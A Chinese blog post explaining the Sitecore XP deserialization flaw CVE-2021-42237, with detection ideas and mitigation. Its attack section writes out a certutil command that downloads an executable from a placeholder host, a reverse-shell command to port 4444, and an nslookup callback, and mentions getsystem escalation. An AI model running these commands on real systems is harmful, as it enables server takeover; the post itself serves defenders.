持续创作,加速成长!这是我参与「掘金日新计划 · 6 月更文挑战」的第16天,点击查看活动详情
今天来分享一个漏洞吧,CVE-2021–42237这代表2021年的第42237个漏洞
首先要先了解一下Sitecore , Sitecore 的体验平台 (XP) 是一个 .NET 企业内容管理系统 (CMS)。Sitecore XP 为您提供用于内容管理、数字营销以及分析和报告的工具。 的体验平台 (XP) 是一个 .NET 企业内容管理系统 (CMS)。Sitecore XP 为您提供用于内容管理、数字营销以及分析和报告的工具。
Sitecore XP 7.5 初始版本到 Sitecore XP 8.2 Update-7 容易受到不安全的反序列化攻击,可以在机器上实现远程命令执行。利用此漏洞无需身份验证或特殊配置。
webshell
Web shell 通常是用典型的 Web 开发编程语言(例如,ASP、PHP、JSP)编写的一小段恶意代码,攻击者将其植入 Web 服务器以提供对服务器功能的远程访问和代码执行。
运行“cmd.exe /c echo”、“certutil.exe”或“powershell.exe”等可疑进程的 IIS 实例 (w3wp.exe) 会导致在 Web 可访问文件夹中创建脚本文件,这种情况很少见并且通常是 web shell 活动的强烈标志。
反序列化
序列化是将对象转换为静态字节流,可以将其保存到数据库或通过网络传输。反序列化是该过程的逆过程,从一系列字节重构数据结构或对象。
当不受信任的数据被用于滥用应用程序的逻辑、造成拒绝服务 (DoS) 攻击,甚至在反序列化时执行任意代码时,就会出现该漏洞。 当网站反序列化用户可控数据时,这可能使攻击者能够操纵序列化对象将有害数据传递到应用程序代码中。
如何进行一次有效的攻击?
- Sitecore XP 在 Report.ashx 文件中使用不安全的反序列化,攻击者可以利用该反序列化在系统上执行任意代码
-
易受攻击的服务器上的扫描尝试
URI: “/sitecore/shell/ClientBin/Reporting/Report.ashx” -
从端点到 burpcollaborator 域的 nslookup
nslookup 5ouceXYZQtem.burpcollaborator.net -
payload下载
“C:\Windows\System32\cmd.exe” /c certutil -urlcache -f https://5ouceXYZQtem.burpcollaborator.netcertutil -f -urlcachehttp://A.B.C.D:8000/file.exe C:\Windows\Temp\file.exe -
反向shell
C:\Windows\Temp\file.exe A.B.C.D 4444 -e cmd
通过成功利用此漏洞,攻击者可以以运行 IIS 实例的用户身份执行任意代码。然后,攻击者可以使用“getsystem”命令来使用 RPCSS 模拟并获得 SYSTEM 级别的代码执行。
检测的一些思路
-
certutil 的可疑使用 识别 certutil.exe 建立网络连接。攻击者可能滥用 certutil.exe 从远程 URL 下载证书或恶意软件。
-
可疑的 nslookup 流量 nslookup.exe 执行和查询到 *.burpcollaborator.net 域
解决方法
推荐的解决方案是升级到理想的安全版本 Sitecore XP 9.0 或更高版本。或者,可以通过从 所有服务器实例上的“/sitecore/shell/ClientBin/Reporting/Report.ashx”中删除 Report.ashx 文件来缓解该漏洞.
